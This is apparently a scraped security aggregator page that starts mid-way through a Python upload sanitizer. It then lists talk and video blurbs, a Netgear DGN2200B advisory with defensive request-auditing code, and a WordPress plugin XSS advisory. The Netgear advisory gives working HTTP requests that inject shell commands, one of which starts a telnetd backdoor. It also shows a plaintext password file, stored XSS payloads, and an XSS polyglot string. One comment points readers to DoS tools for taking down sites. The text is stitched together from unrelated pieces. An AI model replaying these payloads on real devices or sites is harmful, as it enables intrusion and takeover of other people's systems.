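    """Second line of defence: the final path must sit directly inside upload_dir
    even if the sanitizer above is ever weakened."""
    name = safe_upload_name(raw)
    if name is None:
        return None
    root = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(root, name))
    return target if os.path.dirname(target) == root else None


def listing_entry_html(display_name):
    """Device names and folder names end up inside the HTML listing (MyFi 1.2,
    USB Sharp 1.2); escaping at output time shows markup instead of running it."""
    return '<li class="file">%s</li>' % html.escape(display_name, quote=True)


def check_samples():
    """Run every constructed sample through the sanitizer."""
    return {raw: safe_upload_name(raw) for raw in SAMPLES}


if __name__ == "__main__":
    for raw, result in check_samples().items():
        print(repr(raw), "->", result)
    print(listing_entry_html('IPad360"><img src=x>'))
```

Two design points worth noting: decoding is bounded rather than looped forever, and the character allowlist makes the `<`, `>` and quote characters used in both PoCs irrelevant without having to enumerate them.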
  17. Simple methods that we already know. It's OK for beginners. The image from the video is everything.
  18. Slim chances of taking down a 'big' site with these programs. You have Slowloris/T50 Sukhoi PAK FA Mixed Packet Injector on BackTrack.
  19. Description: A breakdown of SQL injection in non-technical terms.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Sql Injection
  20. Description: ColdFusion is a somewhat forgotten but still very prevalent web application development platform. This presentation is a technical survey of ColdFusion security that will be of interest mostly to code auditors, penetration testers, and developers. In the talk, we’ll cover the history of the ColdFusion platform and its relevance to today’s security landscape. We’ll describe the basics of ColdFusion markup, control flow, functions, and components and demonstrate how to identify common web application vulnerabilities in the source code. We’ll also delve into ColdFusion J2EE internals, showing what CFML pages and components look like when compiled down to Java, and describing some of the unusual behavior we’ve observed at that level. Included in the talk is a detailed description of the WAR/EAR structure for compiled ColdFusion apps. We'll release open-source tools to aid reverse engineers in working with ColdFusion's proprietary classfile format.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Blackhat 2010 - Deconstructing Coldfusion
  21. Description: The Google Web Toolkit (GWT) produces some of the slickest web-based applications out there; it’s easy to understand why it has been gathering popularity. But there’s obviously more to writing a secure application than making the UI nice and shiny. The framework’s functionality is not limited to GUI controls - it also has significant support for remote procedure calls. The browser-side code is implemented entirely in JavaScript that the GWT generates from developer-written Java code. While GWT RPC can be implemented securely, many developers either rely on the JavaScript obfuscation, or don’t realize how their Java code is going to be split between the server & client. Either way, insecure GWT remoting is very common. This presentation will demonstrate how to exploit common vulnerabilities in GWT applications, particularly with RPC functionality. The non-human-readable format of the JavaScript makes penetration testing GWT applications very time consuming. To aid with testing, the presenters are releasing REGWT, a tool to reverse engineer GWT applications. It will allow a pen tester to map out GWT RPC methods that would otherwise be hidden and easily test them for various vulnerabilities.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Blackhat 2010 - Gwt Security: Don't Get Distracted By Bright Shiny Objects
  22. Description: How I Met Your Girlfriend: The discovery and execution of entirely new classes of attacks executed from the Web in order to meet your girlfriend. This includes newly discovered attacks including HTML5 client-side XSS (without XSS hitting the server!), PHP session hijacking and weak random numbers (accurately guessing PHP session cookies), browser protocol confusion (turning a browser into an SMTP server), firewall and NAT penetration via JavaScript (turning your router against you), remote iPhone Google Maps hijacking (iPhone penetration combined with HTTP man-in-the-middle), extracting extremely accurate geolocation information from a Web browser (not using IP geolocation), and more.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Blackhat 2010 - How I Met Your Girlfriend
  23. Description: In this, Part 10, of the Aircrack-ng Megaprimer series, I discuss the tool airtun-ng. Airtun-ng is a very useful and versatile tool that creates a virtual tunnel interface. Please visit us at SecurityTube for more information security videos and for the complete megaprimer series: Welcome to SecurityTube.net

As always, if you have any questions, comments, suggestions or feedback you can leave it in the comments section below or you can contact me via e-mail at: bennett [at] securitytube [dot] net

Please follow me on twitter: @pbtomlinson

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Aircrack-Ng Megaprimer Part 10: Airtun-Ng
  24. Netgear DGN2200B suffers from remote command injection and cross site scripting vulnerabilities.

Device Name: DGN2200B
Vendor: Netgear

============
Vulnerable Firmware Releases:
============
Hardwareversion DGN2200B
Firmwareversion V1.0.0.36_7.0.36 - 04/01/2011

============
Device Description:
============
Infos:
http://www.netgear.com/home/products/wirelessrouters/work-and-play/dgn2200.aspx
http://www.netgear.de/products/home/wireless_routers/work-and-play/DGN2200B.aspx#

Firmware download:
http://kb.netgear.com/app/answers/detail/a_id/18990/~/dgn2200%2Fdgn2200b-firmware-version-1.0.0.36

============
Shodan Dorks
============
Shodan Search: NETGEAR DGN2200

============
Vulnerability Overview:
============
* OS Command Injection in the PPPoE configuration:
The vulnerability is caused by missing input validation in the pppoe_username parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device.
Param: pppoe_username Example Request: POST /pppoe.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.0.1/BAS_pppoe.htm Cookie: uid=vjkqK779eJ Authorization: Basic xxxxx= Content-Type: application/x-www-form-urlencoded Content-Length: 593 Connection: close login_type=PPPoE%28PPP+over+Ethernet%29&pppoe_username=%26%20ping%20-c%201%20192%2e168%2e0%2e2%20%26&pppoe_passwd=69cw20hb&pppoe_servicename=&pppoe_dod=1&pppoe_idletime=5&WANAssign=Dynamic&DNSAssign=0&en_nat=1&MACAssign=0&apply=%C3%9Cbernehmen&runtest=yes&wan_ipaddr=0.0.0.0&pppoe_localip=0.0.0.0&wan_dns_sel=0&wan_dns1_pri=0.0.0.0&wan_dns1_sec=...&wan_hwaddr_sel=0&wan_hwaddr_def=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr2=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr_pc=5C%3A26%3A0A%3A2B%3AF0%3A3F&wan_nat=1&opendns_parental_ctrl=0&pppoe_flet_sel=&pppoe_flet_type=&pppoe_temp=&opendns_parental_ctrl=0 => wait around 30 seconds till the configuration is saved and activated start telnetd on port 1337: %26%20telnetd -p 1337%20%26 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN2200B-OS-Command-Injection-Telnetd-started.png * Insecure Cryptographic Storage: There is no password hashing implemented and so it is saved in plain text on the system: ~ # cat /etc/passwd nobody:*:0:0:nobody:/:/bin/sh admin:password:0:0:admin:/:/bin/sh guest:guest:0:0:guest:/:/bin/sh ~ # * stored XSS Injecting scripts into the parameter DomainName mode reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code. 
-> Zugriffsbeschränkungen -> Dienste -> neuen Dienst anlegen -> Dienstname Param: userdefined Original request: POST /fw_serv_add.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.0.1/fw_serv.cgi Cookie: uid=vjkqK779eJ Authorization: Basic xxxx= Content-Type: application/x-www-form-urlencoded Content-Length: 114 userdefined="><img src="0" onerror=alert(1)>&protocol=TCP&portstart=1&portend=5&apply=%C3%9Cbernehmen&which_mode=0 You could also change the request method to HTTP GET: http://192.168.0.1/fw_serv_add.cgi?userdefined="><img%20src="0"%20onerror=alert(1)>&protocol=TCP&portstart=1&portend=5&apply=%C3%9Cbernehmen&which_mode=0 The scriptcode gets executed if you try to edit this service again. Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN2200B-Stored-XSS-Dienste.png * stored XSS: Injecting scripts into the parameter ssid mode reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code. 
-> Wireless-Konfiguration -> Netzwerkname (SSID) Param: ssid POST /wlg_sec_profile_main.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.0.1/WLG_wireless2_2.htm Cookie: uid=vjkqK779eJ Authorization: Basic xxxx= Content-Type: application/x-www-form-urlencoded Content-Length: 328 ssidSelect=1&ssid=%2522%253E%253Cscript%253Ealert%25281%2529%253&WRegion=5&w_channel=0&opmode=20n&enable_ap=1&enable_ssid_bc=1&security_type=AUTO-PSK&passphrase=friendlytrain824&Apply=%C3%9Cbernehmen&tempSetting=0&tempRegion=5&initChannel=0&h_opmode=20n&wds_enable=0&ver_type=WW&pfChanged=0&ssid_sel_submit=0&secure_sel_submit=0 ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de http://www.s3cur1ty.de/m1adv2013-015 Twitter: @s3cur1ty_de ============ Time Line: ============ 17.12.2012 - discovered vulnerability 18.12.2012 - Privately reported all details to vendor 18.12.2012 - vendor responded that they will check the reported vulnerability details 29.01.2013 - vendor contacted me to test a new firmware 29.01.2013 - /me responded that I need more details about the fixes before I will test the new firmware 30.01.2013 - vendor reponded that I should just check it 31.01.2013 - /me responded that I will not check the firmware if they do not provide more details (do not waste my time again!) 11.02.2013 - vendor responded that he has to declare it internally 15.02.2013 - public release ===================== Advisory end ===================== Source: PacketStorm
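The three parameters the advisory walks through can all be checked from the request body alone. Added example, not from the advisory or from Netgear's firmware: a Python auditor that decodes a CGI POST body, flags shell metacharacters in pppoe_username and markup in userdefined/ssid (the SSID payload is double-encoded, so it decodes until the value is stable), and shows the allowlist check the firmware lacked; the allowlist pattern is an assumed policy and the sample bodies are constructed from the advisory's requests with the password replaced by a placeholder.

```python
# Added example, not part of the advisory or of the firmware: a request-body
# auditor for the parameters the advisory names. It URL-decodes a CGI form
# body and flags shell metacharacters in pppoe_username (command injection)
# and markup in userdefined / ssid (stored XSS); pppoe_username_ok() is the
# allowlist check the firmware should have applied (an assumed policy).
import re
from urllib.parse import parse_qs, unquote

COMMAND_PARAMS = {"pppoe_username"}    # reaches a shell in the firmware
HTML_PARAMS = {"userdefined", "ssid"}  # echoed back unescaped by the UI

SHELL_META = re.compile(r"[&;|`$<>\n]")             # never valid in a username
HTML_MARKUP = re.compile(r"<[a-z/!]|\bon[a-z]+\s*=", re.IGNORECASE)
USERNAME_OK = re.compile(r"[A-Za-z0-9._@-]{1,64}")  # assumed allowlist


def fully_decode(value, rounds=3):
    """Decode until stable: the ssid payload is double-encoded
    (%2522 -> %22 -> "), so a single pass would still hide the '<'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def audit_body(body):
    """Return (param, decoded value, finding) for each suspicious field."""
    findings = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for raw in values:  # parse_qs already did one decoding pass
            value = fully_decode(raw)
            if name in COMMAND_PARAMS and SHELL_META.search(value):
                findings.append((name, value, "shell metacharacter"))
            elif name in HTML_PARAMS and HTML_MARKUP.search(value):
                findings.append((name, value, "html markup"))
    return findings

def pppoe_username_ok(value):
    """Positive validation: accept only what a PPPoE username needs."""
    return USERNAME_OK.fullmatch(value) is not None


# Constructed bodies: the first mirrors the advisory's PPPoE request (password
# replaced by a placeholder), the second its double-encoded SSID payload.
PPPOE_BODY = ("login_type=PPPoE%28PPP+over+Ethernet%29"
              "&pppoe_username=%26%20ping%20-c%201%20192%2e168%2e0%2e2%20%26"
              "&pppoe_passwd=REDACTED&pppoe_servicename=")
SSID_BODY = "ssidSelect=1&ssid=%2522%253E%253Cscript%253Ealert%25281%2529%253&WRegion=5"
```

Running audit_body() over PPPOE_BODY and SSID_BODY yields one finding each; the same function applied to a proxy log or a CGI handler's input is the detection side, while pppoe_username_ok() is the fix the firmware should have shipped.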
  25. WordPress Marekkis Watermark plugin suffers from a cross site scripting vulnerability.

#############################
Exploit Title: Reflective XSS in Marekkis Watermark-Plugin Cross-Site Scripting Vulnerability
Author: Aditya Balapure
Home: http://adityabalapure.blogspot.in/
Date: 18/02/13
Software link: http://wordpress.org/extend/plugins/marekkis-watermark/
CVE Assigned: CVE-2013-1758
#############################

Marekkis Watermark-Plugin description

Marekkis Watermark-Plugin for WordPress can watermark your pictures in two different ways:

Insert your watermark while the picture is being uploaded. After the activation every picture that you upload with WordPress' built-in media uploader will be watermarked. In the configuration screen you can set up the position and the type of your watermark. It can be your logo (.png file) with transparent background or a free text with color, font, size, shadow and transparency level of your choice. See screenshots.

Insert your watermark on all chosen pictures from a directory on your web server. Marekkis Watermark makes it possible to create a watermark on media files that are already uploaded on your server. So you can mark all your old pictures with the new watermark.

##########################
XSS location

The Marekkis Watermark-Plugin in WordPress (http://wordpress.org/extend/plugins/marekkis-watermark/) has a Reflected XSS Vulnerability in the Path input box.

Script used:
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

##########################
Vendor Notification
05/02/2013 - Vendor notified, awaiting action
17/02/2013 - Fixed and closed

Source: PacketStorm